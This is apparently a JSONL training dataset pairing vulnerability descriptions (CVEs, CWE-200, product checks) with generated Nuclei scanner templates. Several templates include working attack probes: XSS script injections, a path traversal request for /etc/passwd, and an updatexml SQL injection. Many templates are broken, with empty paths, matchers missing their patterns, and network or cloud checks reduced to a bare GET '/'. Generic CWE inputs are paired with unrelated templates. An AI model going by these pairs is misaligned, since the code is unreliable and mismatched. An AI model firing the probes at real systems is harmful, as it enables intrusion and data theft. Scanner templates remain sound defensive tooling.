Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: scratch\n\ninfo:\n name: Scratch User Name Information - Detect\n author: dwisiswant0\n severity: info\n description: Scratch user name information check was conducted.\n tags: osint,osint-coding,scratch,discovery\n\nhttp:\n - method: GET\n path:\n - \"https://scratch.mit.edu/users/{{user}}/\" \n matchers:\n - type: status\n status:\n - 200\n - type: word\n words:\n - \"on Scratch\" \n part: body", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for CVE-2020-4427", "input": "Title: Authentication Bypass in ibm data_risk_manager\nSummary: IBM Data Risk Manager 2.0.1, 2.0.2, 2.0.3, 2.0.4, 2.0.5, and 2.0.6 could allow a remote attacker to bypass security restrictions when configured with SAML authentication. By sending a specially crafted HTTP request, an attacker could exploit this vulnerability to bypass the authentication process and gain full administrative access to the system. IBM X-Force ID: 180532.\nVulnerability Type: Authentication Bypass\nSeverity: critical\nAffected Products: ibm data_risk_manager\nIndicators: error, vulnerability detected", "output": "id: CVE-2020-4427\n\ninfo:\n name: IBM Data Risk Manager - Authentication Bypass via SAML\n author: ritikchaddha\n severity: critical\n description: IBM Data Risk Manager versions 2.0.1 through 2.0.6 are vulnerable to authentication bypass when configured with SAML authentication. A remote attacker can bypass security restrictions by sending a specially crafted HTTP request to the SAML idpSelection endpoint, allowing them to bypass the authentication process and gain full administrative access to the system.\n tags: cve,cve2020,ibm,saml,auth-bypass,kev,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/albatross/saml/idpSelection?id={{randstr}}&userName=admin\" \n matchers:\n - type: word\n words:\n - \"localhost:8765\" \n - \"saml/idpSelection\" \n part: location\n condition: and\n - type: status\n status:\n - 302", "category": "cve", "severity": "critical", "id": "CVE-2020-4427"} {"instruction": "Generate a Nuclei template for: Nextcloud Exposed Installation", "input": "Title: Nextcloud Exposed Installation\nSummary: Nextcloud Exposed Installation. Nextcloud installation is exposed.\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: nextcloud-install\n\ninfo:\n name: Nextcloud Exposed Installation\n author: skeltavik\n severity: high\n description: Nextcloud installation is exposed.\n tags: tech,nextcloud,storage,misconfig,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"
Create an admin account\" \n - \"Storage & database\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "nextcloud-install"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: workspace-one-uem-ssp\n\ninfo:\n name: VMware Workspace ONE UEM Airwatch Self-Service Portal - Detect\n author: KoratSec\n severity: info\n description: VMware Workspace ONE UEM Airwatch Self-Service Portal (SSP) login panel was detected.\n tags: panel,workspaceone,vmware,airwatch,ssp,login,detect,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/MyDevice/Login\" \n matchers:\n - type: word\n words:\n - \"Self-Service Portal\" \n - \"AirWatch\" \n part: body\n condition: and", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for: ssh-agent - Privilege Escalation", "input": "Title: ssh-agent - Privilege Escalation\nSummary: ssh-agent - Privilege Escalation. ssh-agent is a program that helps manage and store private keys used for SSH authentication. It is often used to hold the decrypted private keys in memory, allowing for seamless authentication to remote servers without the need to re-enter passphrases for the keys.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: privesc-ssh-agent\n\ninfo:\n name: ssh-agent - Privilege Escalation\n author: daffainfo\n severity: high\n description: ssh-agent is a program that helps manage and store private keys used for SSH authentication. It is often used to hold the decrypted private keys in memory, allowing for seamless authentication to remote servers without the need to re-enter passphrases for the keys.\n tags: code,linux,ssh-agent,privesc,local\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "privesc-ssh-agent"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: iptime-router\n\ninfo:\n name: ipTIME Router Login Panel - Detect\n author: gy741\n severity: info\n description: ipTIME router login panel was detected.\n tags: panel,login,iptime,router,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/sess-bin/login_session.cgi\" \n matchers:\n - type: regex\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template to detect Cross-site Scripting", "input": "Title: Cross-site Scripting (CWE-79)\nSummary: The product does not neutralize or incorrectly neutralizes user-controllable input before it is placed in output that is used as a web page that is served to other users. There are many variants of cross-site scripting, characterized by a variety of terms or involving different attack topologies. However, they all indicate the same fundamental weakness: improper neutralization of dangerous input between the adversary and a victim.\nVulnerability Type: Cross-site Scripting\nSeverity: high\nIndicators: vulnerability detected, error", "output": "id: wp-slideshow-xss\n\ninfo:\n name: WordPress Slideshow - Cross-Site Scripting\n author: daffainfo\n severity: high\n description: WordPress Slideshow plugin contains multiple cross-site scripting vulnerabilities. An attacker can execute arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n tags: wordpress,xss,wp-plugin,edb,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"Slideshow\" \n - \"Stable tag:\" \n condition: and\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?randomId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\" \n matchers:\n - type: word\n words:\n - \"\" \n part: body\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cwe", "severity": "high", "id": "CWE-79"} {"instruction": "Generate a Nuclei template for CVE-2017-10271", "input": "Title: Vulnerability (CWE-306) in oracle weblogic_server\nSummary: Vulnerability in the Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent: WLS Security). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 7.5 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).\nVulnerability Type: Vulnerability (CWE-306)\nSeverity: high\nAffected Products: oracle weblogic_server\nIndicators: error, vulnerability detected", "output": "id: CVE-2017-10271\n\ninfo:\n name: Oracle WebLogic Server - Remote Command Execution\n author: dr_set,ImNightmaree,true13\n severity: high\n description: The Oracle WebLogic Server component of Oracle Fusion Middleware (subcomponent - WLS Security) is susceptible to remote command execution. Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. This easily exploitable vulnerability allows unauthenticated attackers with network access via T3 to compromise Oracle WebLogic Server.\n tags: cve,cve2017,weblogic,oast,kev,vulhub,rce,oracle,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and\n - type: dsl\n condition: and", "category": "cve", "severity": "high", "id": "CVE-2017-10271"} {"instruction": "Generate a Nuclei template for CVE-2020-11798", "input": "Title: Path Traversal in mitel micollab_audio\\,_web_\\&_video_conferencing\nSummary: A Directory Traversal vulnerability in the web conference component of Mitel MiCollab AWV before 8.1.2.4 and 9.x before 9.1.3 could allow an attacker to access arbitrary files from restricted directories of the server via a crafted URL, due to insufficient access validation. A successful exploit could allow an attacker to access sensitive information from the restricted directories.\nVulnerability Type: Path Traversal\nSeverity: medium\nAffected Products: mitel micollab_audio\\,_web_\\&_video_conferencing\nIndicators: error, vulnerability detected", "output": "id: CVE-2020-11798\n\ninfo:\n name: Mitel MiCollab AWV 8.1.2.4 and 9.1.3 - Directory Traversal\n author: ritikchaddha\n severity: medium\n description: A Directory Traversal vulnerability in the web conference component of Mitel MiCollab AWV before 8.1.2.4 and 9.x before 9.1.3 could allow an attacker to access arbitrary files from restricted directories of the server via a crafted URL, due to insufficient access validation. A successful exploit could allow an attacker to access sensitive information from the restricted directories.\n tags: cve,cve2020,packetstorm,mitel,micollab,lfi,vkev,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/awcuser/cgi-bin/vcs_access_file.cgi?file=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f/etc/passwd\" \n matchers:\n - type: regex\n part: body\n - type: word\n words:\n - \"application/x-download\" \n - \"filename=passwd\" \n part: header\n condition: and\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2020-11798"} {"instruction": "Generate a Nuclei template for CVE-2023-5561", "input": "Title: Unknown Vulnerability in wordpress wordpress\nSummary: WordPress does not properly restrict which user fields are searchable via the REST API, allowing unauthenticated attackers to discern the email addresses of users who have published public posts on an affected website via an Oracle style attack\nVulnerability Type: Unknown Vulnerability\nSeverity: medium\nAffected Products: wordpress wordpress\nIndicators: error, vulnerability detected", "output": "id: CVE-2023-5561\n\ninfo:\n name: WordPress Core - Post Author Email Disclosure\n author: nqdung2002\n severity: medium\n description: WordPress Core is vulnerable to Sensitive Information Exposure in versions between 4.7.0 and 6.3.1 via the User REST endpoint. While the search results do not display user email addresses unless the requesting user has the 'list_users' capability, the search is applied to the user_email column.\n tags: cve,cve2023,wpscan,disclosure,wp,wordpress,email,exposure,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n - method: GET\n path:\n - \"{{BaseURL}}/{{route}}search=@\" \n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "medium", "id": "CVE-2023-5561"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: adapt-panel\n\ninfo:\n name: Adapt Authoring Tool - Panel\n author: Splint3r7\n severity: info\n description: Login panel for adapt was detected.\n tags: panel,adapt,login,detect,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: dsl\n condition: and", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: splash-rendering-service\n\ninfo:\n name: Splash - Detect\n author: pussycat0x\n severity: info\n description: Splash rendering service was detected.\n tags: tech,splash,detect,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}\" \n matchers:\n - type: word\n words:\n - \"Splash\" \n - \"splash.loadExample\" \n part: body\n condition: and\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for: SAP NetWeaver Composition Environment Tools - Detect", "input": "Title: SAP NetWeaver Composition Environment Tools - Detect\nSummary: SAP NetWeaver Composition Environment Tools - Detect. Detects the presence of the SAP NetWeaver Process Integration / Composition Environment Tools page\n\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: sap-netweaver-cet-detect\n\ninfo:\n name: SAP NetWeaver Composition Environment Tools - Detect\n author: ap3r\n severity: info\n description: Detects the presence of the SAP NetWeaver Process Integration / Composition Environment Tools page\n tags: sap,netweaver,cet,detect,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/rep/start/index.jsp\" \n matchers:\n - type: word\n words:\n - \"Composition Environment Tools\" \n part: body\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "sap-netweaver-cet-detect"} {"instruction": "Generate a Nuclei template for: E-cology FileDownloadForOutDocSQL - SQL Injection", "input": "Title: E-cology FileDownloadForOutDocSQL - SQL Injection\nSummary: E-cology FileDownloadForOutDocSQL - SQL Injection. e-cology did not effectively filter the user input, but directly spliced it into the SQL query statement, resulting in SQL injection vulnerabilities in the system\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: ecology-oa-file-sqli\n\ninfo:\n name: E-cology FileDownloadForOutDocSQL - SQL Injection\n author: momika233\n severity: high\n description: e-cology did not effectively filter the user input, but directly spliced it into the SQL query statement, resulting in SQL injection vulnerabilities in the system\n tags: time-based-sqli,ecology,ecology-oa,sqli,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "generic", "severity": "high", "id": "ecology-oa-file-sqli"} {"instruction": "Generate a Nuclei template for CVE-2022-1580", "input": "Title: Vulnerability (CWE-639) in freehtmldesigns site_offline\nSummary: The Site Offline Or Coming Soon Or Maintenance Mode WordPress plugin before 1.5.3 prevents users from accessing a website but does not do so if the URL contained certain keywords. Adding those keywords to the URL's query string would bypass the plugin's main feature.\nVulnerability Type: Vulnerability (CWE-639)\nSeverity: medium\nAffected Products: freehtmldesigns site_offline\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-1580\n\ninfo:\n name: Site Offline WP Plugin < 1.5.3 - Authorization Bypass\n author: s4e-io\n severity: medium\n description: The plugin prevents users from accessing a website but does not do so if the URL contained certain keywords. Adding those keywords to the URL's query string would bypass the plugin's main feature.\n tags: cve,cve2022,wpscan,site-offline,wordpress,wp-plugin,wp,freehtmldesigns,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/site-offline/readme.txt\" \n matchers:\n - type: word\n words:\n - \"Site Offline Or Coming Soon Or Maintenance Mode\" \n - method: GET\n path:\n - \"{{BaseURL}}/?admin\" \n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "medium", "id": "CVE-2022-1580"} {"instruction": "Generate a Nuclei template for CVE-2024-11921", "input": "Title: Cross-Site Scripting (XSS) in givewp givewp\nSummary: The GiveWP WordPress plugin before 3.19.0 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: givewp givewp\nIndicators: error, vulnerability detected", "output": "id: CVE-2024-11921\n\ninfo:\n name: Give WP Plugin < 3.19.0 - Cross-Site Scripting\n author: Splint3r7\n severity: high\n description: The plugin does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.\n tags: cve,cve2024,wordpress,wp,wp-plugin,give,xss,authenticated,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "medium", "id": "CVE-2024-11921"} {"instruction": "Generate a Nuclei template for CVE-2022-2130", "input": "Title: Cross-Site Scripting (XSS) in microweber microweber\nSummary: Cross-site Scripting (XSS) - Reflected in GitHub repository microweber/microweber prior to 1.2.17.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: microweber microweber\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-2130\n\ninfo:\n name: Microweber < 1.2.17 - Cross-Site Scripting\n author: ritikchaddha\n severity: medium\n description: Cross-site Scripting (XSS) vulnerability in the /demo/editor_tools/module endpoint via the 'type' parameter.\n tags: cve,cve2022,microweber,xss,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/editor_tools/module?type=%22%3E%3Cdiv%3E%3Cscript%3Ealert(document.domain)%3C/script%3E\" \n matchers:\n - type: word\n words:\n - \"</tag><div><script>alert(document.domain)</script>\" \n part: body\n - type: word\n words:\n - \"text/html\" \n part: content_type\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2022-2130"} {"instruction": "Generate a Nuclei template for CVE-2006-6565", "input": "Title: Vulnerability (CWE-476) in filezilla-project filezilla_server\nSummary: FileZilla Server before 0.9.22 allows remote attackers to cause a denial of service (crash) via a wildcard argument to the (1) LIST or (2) NLST commands, which results in a NULL pointer dereference, a different set of vectors than CVE-2006-6564. NOTE: CVE analysis suggests that the problem might be due to a malformed PORT command.\nVulnerability Type: Vulnerability (CWE-476)\nSeverity: medium\nAffected Products: filezilla-project filezilla_server\nIndicators: error, vulnerability detected", "output": "id: CVE-2006-6565\n\ninfo:\n name: FileZilla Server < 0.9.22 - DoS via Wildcard Commands\n author: pussycat0x\n severity: medium\n description: FileZilla Server versions prior to 0.9.22 are vulnerable to remote denial of service (crash) when processing wildcard arguments to LIST/NLST commands, malformed PORT commands, or other malformed commands. This leads to NULL pointer dereference that can crash the server.\n tags: cve,cve2006,network,ftp,filezilla,tcp,passive,vuln\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2006-6565"} {"instruction": "Generate a Nuclei template for: WP Mail SMTP by WPForms \u2013 The Most Popular SMTP and Email Log Plugin Detection", "input": "Title: WP Mail SMTP by WPForms \u2013 The Most Popular SMTP and Email Log Plugin Detection\nSummary: WP Mail SMTP by WPForms \u2013 The Most Popular SMTP and Email Log Plugin Detection\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: wordpress-wp-mail-smtp\n\ninfo:\n name: WP Mail SMTP by WPForms \u2013 The Most Popular SMTP and Email Log Plugin Detection\n author: ricardomaia\n severity: info\n description: WP Mail SMTP by WPForms \u2013 The Most Popular SMTP and Email Log Plugin Detection\n tags: tech,wordpress,wp-plugin,top-100,top-200,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/wp-content/plugins/wp-mail-smtp/readme.txt\" \n matchers:\n - type: dsl\n - type: regex\n part: body", "category": "generic", "severity": "info", "id": "wordpress-wp-mail-smtp"} {"instruction": "Generate a Nuclei template for: LibrePhotos Panel - Detect", "input": "Title: LibrePhotos Panel - Detect\nSummary: LibrePhotos Panel - Detect. Tags: panel, librephotos, detect\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: librephotos-panel\n\ninfo:\n name: LibrePhotos Panel - Detect\n author: ritikchaddha\n severity: info\n description: LibrePhotos Panel - Detect\n tags: panel,librephotos,detect,login,discovery\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/login\" \n matchers:\n - type: word\n words:\n - \"<title>LibrePhotos\" \n part: body\n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "librephotos-panel"} {"instruction": "Generate a Nuclei template for CVE-2020-27615", "input": "Title: SQL Injection in loginizer loginizer\nSummary: The Loginizer plugin before 1.6.4 for WordPress allows SQL injection (with resultant XSS), related to loginizer_login_failed and lz_valid_ip.\nVulnerability Type: SQL Injection\nSeverity: critical\nAffected Products: loginizer loginizer\nIndicators: failed", "output": "id: CVE-2020-27615\n\ninfo:\n name: WordPress Loginizer < 1.6.4 \u2013 Unauthenticated SQL Injection via `log` Parameter\n author: intelligent-ears\n severity: critical\n description: The Loginizer plugin before 1.6.4 for WordPress allows SQL injection (with resultant XSS), related to loginizer_login_failed and lz_valid_ip.\n tags: wpscan,cve,cve2020,wordpress,wp-plugin,wp,loginizer,sqli,time-based,vkev,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and\n - method: GET\n path:\n matchers:\n - type: dsl\n condition: and", "category": "cve", "severity": "critical", "id": "CVE-2020-27615"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: opcache-status-exposure\n\ninfo:\n name: OPcache Status Page - Detect\n author: pdteam\n severity: medium\n description: OPcache status page was detected.\n tags: config,exposure,status,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/opcache-status/\" \n - \"{{BaseURL}}/php-opcache-status/\" \n - \"{{BaseURL}}/opcache-status/opcache.php\" \n matchers:\n - type: word\n words:\n - \"<th>opcache_enabled</th>\" \n - \"<th>opcache_hit_rate</th>\" \n part: body\n condition: and", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information exposures. The severity of the error can range widely, depending on the context in which the product operates, the type of sensitive information that is revealed, and the benefits it may provide to an attacker. Some kinds of sensitive information include: \n private, personal information, such as p\nVulnerability Type: Exposure of Sensitive Information to an Unauthorized Actor\nSeverity: medium\nIndicators: error, unauthorized", "output": "id: esmtp-detect\n\ninfo:\n name: ESMTP - Detect\n author: pussycat0x,userdehghani\n severity: info\n description: ESMTP was detected.\n tags: network,detect,smtp,mail,detection,tcp,discovery\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "cwe", "severity": "medium", "id": "CWE-200"} {"instruction": "Generate a Nuclei template for CVE-2012-4889", "input": "Title: Cross-Site Scripting (XSS) in manageengine firewall_analyzer\nSummary: Multiple cross-site scripting (XSS) vulnerabilities in ManageEngine Firewall Analyzer 7.2 allow remote attackers to inject arbitrary web script or HTML via the (1) subTab or (2) tab parameter to createAnomaly.do; (3) url, (4) subTab, or (5) tab parameter to mindex.do; (6) tab parameter to index2.do; or (7) port parameter to syslogViewer.do.\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: manageengine firewall_analyzer\nIndicators: error, vulnerability detected", "output": "id: CVE-2012-4889\n\ninfo:\n name: ManageEngine Firewall Analyzer 7.2 - Cross-Site Scripting\n author: daffainfo\n severity: medium\n description: Multiple cross-site scripting vulnerabilities in ManageEngine Firewall Analyzer 7.2 allow remote attackers to inject arbitrary web script or HTML via the (1) subTab or (2) tab parameter to createAnomaly.do; (3) url, (4) subTab, or (5) tab parameter to mindex.do; (6) tab parameter to index2.do; or (7) port parameter to syslogViewer.do.\n tags: cve,cve2012,xss,manageengine,packetstorm,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/fw/syslogViewer.do?port=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E\" \n matchers:\n - type: word\n words:\n - \"</script><script>alert(document.domain)</script>\" \n part: body\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2012-4889"} {"instruction": "Generate a Nuclei template for: Shiziyu CMS Api Controller - SQL Injection", "input": "Title: Shiziyu CMS Api Controller - SQL Injection\nSummary: Shiziyu CMS Api Controller - SQL Injection. Shiziyu CMS ApiController.class.php parameter filtering is not rigorous, resulting in SQL injection vulnerability.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: shiziyu-cms-apicontroller-sqli\n\ninfo:\n name: Shiziyu CMS Api Controller - SQL Injection\n author: SleepingBag945\n severity: high\n description: Shiziyu CMS ApiController.class.php parameter filtering is not rigorous, resulting in SQL injection vulnerability.\n tags: sqli,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/index.php?s=api/goods_detail&goods_id=1%20and%20updatexml(1,concat(0x7e,md5({{num}}),0x7e),1)\" \n matchers:\n - type: word\n words:\n - \"c8c605999f3d8352d7bb792cf3fdb25\" \n part: body\n - type: status\n status:\n - 404", "category": "generic", "severity": "high", "id": "shiziyu-cms-apicontroller-sqli"} {"instruction": "Generate a Nuclei template for: CloudFront Traffic To Origin Unencrypted", "input": "Title: CloudFront Traffic To Origin Unencrypted\nSummary: CloudFront Traffic To Origin Unencrypted. Ensure that the communication between your Amazon CloudFront distributions and their custom origins is encrypted using HTTPS in order to secure the delivery of your web content and fulfill compliance requirements for encryption in transit.\n\nVulnerability Type: Security Check\nSeverity: medium\nIndicators: vulnerability detected", "output": "id: cloudfront-traffic-unencrypted\n\ninfo:\n name: CloudFront Traffic To Origin Unencrypted\n author: DhiyaneshDK\n severity: medium\n description: Ensure that the communication between your Amazon CloudFront distributions and their custom origins is encrypted using HTTPS in order to secure the delivery of your web content and fulfill compliance requirements for encryption in transit.\n tags: cloud,devops,aws,amazon,cloudfront,aws-cloud-config\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "medium", "id": "cloudfront-traffic-unencrypted"} {"instruction": "Generate a Nuclei template for CVE-2022-28290", "input": "Title: Cross-Site Scripting (XSS) in welaunch wordpress_country_selector\nSummary: Reflective Cross-Site Scripting vulnerability in WordPress Country Selector Plugin Version 1.6.5. The XSS payload executes whenever the user tries to access the country selector page with the specified payload as a part of the HTTP request\nVulnerability Type: Cross-Site Scripting (XSS)\nSeverity: medium\nAffected Products: welaunch wordpress_country_selector\nIndicators: error, vulnerability detected", "output": "id: CVE-2022-28290\n\ninfo:\n name: WordPress Country Selector <1.6.6 - Cross-Site Scripting\n author: Akincibor\n severity: medium\n description: WordPress Country Selector plugin prior to 1.6.6 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape the country and lang parameters before outputting them back in the response. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.\n tags: cve,cve2022,wordpress-country-selector,wpscan,wp,wordpress,wp-plugin,xss,welaunch,vuln\n\nhttp:\n - method: GET\n path:\n matchers:\n - type: word\n words:\n - \"<img src=x onerror=alert(document.domain)>\" \n - \"country_selector_\" \n part: body\n condition: and\n - type: word\n words:\n - \"text/html\" \n part: header\n - type: status\n status:\n - 200", "category": "cve", "severity": "medium", "id": "CVE-2022-28290"} {"instruction": "Generate a Nuclei template for: CloudTrail Log Integrity Validation not Enabled", "input": "Title: CloudTrail Log Integrity Validation not Enabled\nSummary: CloudTrail Log Integrity Validation not Enabled. Ensure CloudTrail log file integrity validation is enabled to detect unauthorized file modifications.\n\nVulnerability Type: Security Check\nSeverity: high\nIndicators: vulnerability detected", "output": "id: cloudtrail-log-integrity\n\ninfo:\n name: CloudTrail Log Integrity Validation not Enabled\n author: princechaddha\n severity: high\n description: Ensure CloudTrail log file integrity validation is enabled to detect unauthorized file modifications.\n tags: cloud,devops,aws,amazon,cloudtrail,aws-cloud-config\n\nhttp:\n - method: GET\n path:\n - \"/\" \n matchers:\n - type: status\n status:\n - 200", "category": "generic", "severity": "high", "id": "cloudtrail-log-integrity"} {"instruction": "Generate a Nuclei template for: WordPress license file disclosure", "input": "Title: WordPress license file disclosure\nSummary: WordPress license file disclosure. Leaked WordPress license file.\nVulnerability Type: Security Check\nSeverity: info\nIndicators: vulnerability detected", "output": "id: wp-license-file\n\ninfo:\n name: WordPress license file disclosure\n author: yashgoti\n severity: info\n description: Leaked WordPress license file.\n tags: wordpress,vuln\n\nhttp:\n - method: GET\n path:\n - \"{{BaseURL}}/license.txt\" \n matchers:\n - type: word\n words:\n - \"WordPress - Web publishing software\" \n - type: status\n status:\n - 200", "category": "generic", "severity": "info", "id": "wp-license-file"} {"instruction": "Generate a Nuclei template to detect Exposure of Sensitive Information to an Unauthorized Actor", "input": "Title: Exposure of Sensitive Information to an Unauthorized Actor (CWE-200)\nSummary: The product exposes sensitive information to an actor that is not explicitly authorized to have access to that information. There are many different kinds of mistakes that introduce information 